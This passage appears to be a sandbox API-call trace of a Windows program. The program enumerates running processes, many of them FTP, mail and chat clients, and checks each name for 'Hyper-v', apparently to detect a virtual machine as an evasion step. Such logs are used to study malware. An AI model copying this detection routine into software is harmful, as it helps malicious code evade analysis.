lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0102.516] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0102.516] StrStrIA (lpFirst="alftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.516] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0102.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.517] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570a40 [0102.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3570a40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0102.517] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0102.517] StrStrIA (lpFirst="barca.exe", lpSrch="Hyper-v") returned 0x0 [0102.517] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0102.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.518] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35709e0 [0102.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35709e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0102.518] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0102.518] StrStrIA (lpFirst="bitkinex.exe", lpSrch="Hyper-v") returned 0x0 [0102.518] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0102.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.547] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35708f0 [0102.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35708f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0102.547] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0102.547] StrStrIA (lpFirst="coreftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.547] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0102.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0102.549] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e148 [0102.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e148, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0102.549] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0102.549] StrStrIA (lpFirst="far.exe", lpSrch="Hyper-v") returned 0x0 [0102.549] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0102.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.550] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570938 [0102.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3570938, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0102.550] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0102.550] StrStrIA (lpFirst="filezilla.exe", lpSrch="Hyper-v") returned 0x0 [0102.550] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0102.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.551] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570968 [0102.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3570968, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.552] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0102.552] StrStrIA (lpFirst="flashfxp.exe", lpSrch="Hyper-v") returned 0x0 [0102.552] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0102.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.553] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570a28 [0102.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3570a28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0102.553] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0102.553] StrStrIA (lpFirst="fling.exe", lpSrch="Hyper-v") returned 0x0 [0102.553] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0102.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.554] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f560 [0102.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357f560, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0102.554] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0102.554] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="Hyper-v") returned 0x0 [0102.554] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0102.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.555] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f5a0 [0102.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357f5a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0102.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0102.555] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="Hyper-v") returned 0x0 [0102.555] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0102.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0102.556] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e268 [0102.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e268, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0102.557] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0102.557] StrStrIA (lpFirst="icq.exe", lpSrch="Hyper-v") returned 0x0 [0102.557] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0102.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.558] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570908 [0102.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570908, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.558] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0102.558] StrStrIA (lpFirst="leechftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.558] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0102.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.559] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570950 [0102.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570950, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0102.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0102.559] StrStrIA (lpFirst="ncftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.559] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0102.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.560] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35709b0 [0102.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35709b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0102.560] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0102.560] StrStrIA (lpFirst="notepad.exe", lpSrch="Hyper-v") returned 0x0 [0102.561] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0102.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.562] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35707a0 [0102.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35707a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0102.562] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0102.562] StrStrIA (lpFirst="operamail.exe", lpSrch="Hyper-v") returned 0x0 [0102.562] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0102.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.563] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570920 [0102.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3570920, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0102.563] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0102.563] StrStrIA (lpFirst="pidgin.exe", lpSrch="Hyper-v") returned 0x0 [0102.563] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0102.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.564] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570818 [0102.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570818, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0102.565] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0102.565] StrStrIA (lpFirst="scriptftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.565] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0102.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.566] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570980 [0102.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3570980, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0102.566] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0102.566] StrStrIA (lpFirst="skype.exe", lpSrch="Hyper-v") returned 0x0 [0102.566] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0102.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.568] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570830 [0102.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570830, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0102.568] StrStrIA (lpFirst="smartftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.568] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0102.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.569] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570a58 [0102.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3570a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0102.569] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0102.569] StrStrIA (lpFirst="totalcmd.exe", lpSrch="Hyper-v") returned 0x0 [0102.569] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0102.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.570] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570998 [0102.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3570998, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0102.570] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0102.570] StrStrIA (lpFirst="trillian.exe", lpSrch="Hyper-v") returned 0x0 [0102.570] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0102.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.571] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35709f8 [0102.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35709f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0102.571] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0102.572] StrStrIA (lpFirst="webdrive.exe", lpSrch="Hyper-v") returned 0x0 [0102.572] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0102.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.573] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35708c0 [0102.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35708c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.573] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0102.573] StrStrIA (lpFirst="whatsapp.exe", lpSrch="Hyper-v") returned 0x0 [0102.573] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0102.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.574] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35709c8 [0102.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35709c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", 